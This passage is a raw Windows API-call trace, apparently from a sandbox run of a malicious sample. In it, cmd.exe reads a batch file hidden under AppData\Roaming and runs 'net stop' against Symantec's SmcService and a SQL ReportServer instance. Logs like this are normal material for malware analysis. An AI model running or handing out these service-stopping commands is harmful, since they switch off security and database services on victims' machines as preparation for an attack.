lpNumberOfBytesRead=0x3bf238*=0x1105, lpOverlapped=0x0) returned 1 [0046.267] SetFilePointer (in: hFile=0x74, lDistanceToMove=2004, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d4 [0046.267] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=24, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop SmcService /y\r\n$TPS /y\r\ny\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 24 [0046.267] _get_osfhandle (_FileHandle=3) returned 0x74 [0046.267] GetFileType (hFile=0x74) returned 0x1 [0046.267] _get_osfhandle (_FileHandle=3) returned 0x74 [0046.267] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d4 [0046.267] GetProcessHeap () returned 0x3e0000 [0046.267] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0046.267] GetProcessHeap () returned 0x3e0000 [0046.267] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0046.267] _tell (_FileHandle=3) returned 2004 [0046.268] _close (_FileHandle=3) returned 0 [0046.268] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0046.268] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0046.268] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0046.268] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0046.268] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0046.268] _wcsicmp (_String1="net", _String2="CD") returned 11 [0046.268] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0046.268] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0046.268] _wcsicmp (_String1="net", _String2="REN") returned -4 [0046.268] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0046.268] _wcsicmp (_String1="net", _String2="SET") returned -5 [0046.268] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0046.268] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0046.268] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0046.268] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0046.268] _wcsicmp (_String1="net", _String2="MD") returned 1 [0046.268] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0046.268] _wcsicmp (_String1="net", _String2="RD") returned -4 [0046.268] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0046.268] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0046.268] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0046.268] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0046.268] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0046.268] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0046.268] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0046.268] _wcsicmp (_String1="net", _String2="VER") returned -8 [0046.268] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0046.268] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0046.268] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0046.268] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0046.268] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0046.269] _wcsicmp (_String1="net", _String2="START") returned -5 [0046.269] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0046.269] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0046.269] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0046.269] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0046.269] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0046.269] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0046.269] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0046.269] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0046.269] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0046.269] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0046.269] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0046.269] SetErrorMode (uMode=0x0) returned 0x1 [0046.269] GetProcessHeap () returned 0x3e0000 [0046.269] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0046.269] GetProcessHeap () returned 0x3e0000 [0046.269] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0046.269] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.269] GetProcessHeap () returned 0x3e0000 [0046.269] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0046.269] GetProcessHeap () returned 0x3e0000 [0046.269] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0046.269] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0046.269] GetProcessHeap () returned 0x3e0000 [0046.269] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0046.269] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.269] GetProcessHeap () returned 0x3e0000 [0046.269] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0046.269] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0046.269] GetProcessHeap () returned 0x3e0000 [0046.269] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0046.270] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.270] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.270] GetLastError () returned 0x2 [0046.270] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.270] GetLastError () returned 0x2 [0046.270] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.270] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0046.270] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0046.270] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.270] GetLastError () returned 0x2 [0046.270] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0046.270] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0046.271] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.271] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0046.271] SetErrorMode (uMode=0x0) returned 0x1 [0046.271] GetProcessHeap () returned 0x3e0000 [0046.271] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0046.271] GetProcessHeap () returned 0x3e0000 [0046.271] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0046.271] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.271] GetProcessHeap () returned 0x3e0000 [0046.271] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0046.271] GetProcessHeap () returned 0x3e0000 [0046.271] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0046.271] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0046.271] GetProcessHeap () returned 0x3e0000 [0046.271] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0046.271] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.271] GetProcessHeap () returned 0x3e0000 [0046.271] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0046.271] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0046.271] GetProcessHeap () returned 0x3e0000 [0046.271] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0046.271] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.271] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.272] GetLastError () returned 0x2 [0046.272] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.272] GetLastError () returned 0x2 [0046.272] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0046.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0046.272] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0046.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.272] GetLastError () returned 0x2 [0046.272] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0046.272] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0046.272] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.273] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0046.273] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0046.273] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0046.273] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0046.273] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SmcService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SmcService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SmcService /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x128, dwThreadId=0x33c)) returned 1 [0046.277] CloseHandle (hObject=0x74) returned 1 [0046.277] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0046.277] GetProcessHeap () returned 0x3e0000 [0046.277] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.277] GetEnvironmentStringsW () returned 0x3f8408* [0046.277] GetProcessHeap () returned 0x3e0000 [0046.277] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.278] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.278] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0046.498] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0046.499] CloseHandle (hObject=0x78) returned 1 [0046.499] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0046.499] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0046.499] GetProcessHeap () returned 0x3e0000 [0046.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.499] GetEnvironmentStringsW () returned 0x3f8408* [0046.499] GetProcessHeap () returned 0x3e0000 [0046.499] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.499] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.499] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0046.499] GetProcessHeap () returned 0x3e0000 [0046.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0046.499] GetEnvironmentStringsW () returned 0x3f8408* [0046.499] GetProcessHeap () returned 0x3e0000 [0046.499] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0046.499] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0046.499] GetProcessHeap () returned 0x3e0000 [0046.499] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0046.499] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0046.499] _get_osfhandle (_FileHandle=1) returned 0x264 [0046.499] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0046.499] _get_osfhandle (_FileHandle=1) returned 0x264 [0046.499] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0046.500] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0046.500] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0046.500] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0046.500] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0046.500] SetConsoleInputExeNameW () returned 0x1 [0046.500] GetConsoleOutputCP () returned 0x1b5 [0046.500] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0046.500] SetThreadUILanguage (LangId=0x0) returned 0x409 [0046.500] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0046.501] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0046.501] _get_osfhandle (_FileHandle=3) returned 0x78 [0046.501] SetFilePointer (in: hFile=0x78, lDistanceToMove=2004, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d4 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0046.501] GetProcessHeap () returned 0x3e0000 [0046.501] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0046.501] _get_osfhandle (_FileHandle=3) returned 0x78 [0046.502] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d4 [0046.502] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x10ed, lpOverlapped=0x0) returned 1 [0046.502] SetFilePointer (in: hFile=0x78, lDistanceToMove=2037, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7f5 [0046.502] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=33, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ReportServer$TPSAMA /y\r\ny\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 33 [0046.502] _get_osfhandle (_FileHandle=3) returned 0x78 [0046.502] GetFileType (hFile=0x78) returned 0x1 [0046.502] _get_osfhandle (_FileHandle=3) returned 0x78 [0046.502] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7f5 [0046.502] GetProcessHeap () returned 0x3e0000 [0046.502] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0046.502] GetProcessHeap () returned 0x3e0000 [0046.502] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0046.502] _tell (_FileHandle=3) returned 2037 [0046.502] _close (_FileHandle=3) returned 0 [0046.503] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0046.503] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0046.503] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0046.503] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0046.503] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0046.503] _wcsicmp (_String1="net", _String2="CD") returned 11 [0046.503] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0046.503] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0046.503] _wcsicmp (_String1="net", _String2="REN") returned -4 [0046.503] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0046.503] _wcsicmp (_String1="net", _String2="SET") returned -5 [0046.503] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0046.503] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0046.503] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0046.503] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0046.503] _wcsicmp (_String1="net", _String2="MD") returned 1 [0046.503] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0046.503] _wcsicmp (_String1="net", _String2="RD") returned -4 [0046.503] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0046.503] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0046.503] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0046.503] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0046.503] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0046.503] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0046.503] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0046.503] _wcsicmp (_String1="net", _String2="VER") returned -8 [0046.503] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0046.503] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0046.503] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0046.503] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0046.503] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0046.504] _wcsicmp (_String1="net", _String2="START") returned -5 [0046.504] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0046.504] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0046.504] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0046.504] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0046.504] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0046.504] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0046.504] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0046.504] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0046.504] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0046.504] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0046.504] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.504] GetProcessHeap () returned 0x3e0000 [0046.504] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0046.504] GetProcessHeap () returned 0x3e0000 [0046.504] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0046.504] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.504] GetLastError () returned 0x2 [0046.504] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.504] GetLastError () returned 0x2 [0046.505] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0046.505] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0046.505] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0046.505] GetLastError () returned 0x2 [0046.505] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0046.505] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0046.505] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.505] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0046.505] GetProcessHeap () returned 0x3e0000 [0046.505] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0046.505] GetProcessHeap () returned 0x3e0000 [0046.505] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0046.505] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.506] GetLastError () returned 0x2 [0046.506] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0046.506] GetLastError () returned 0x2 [0046.506] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, 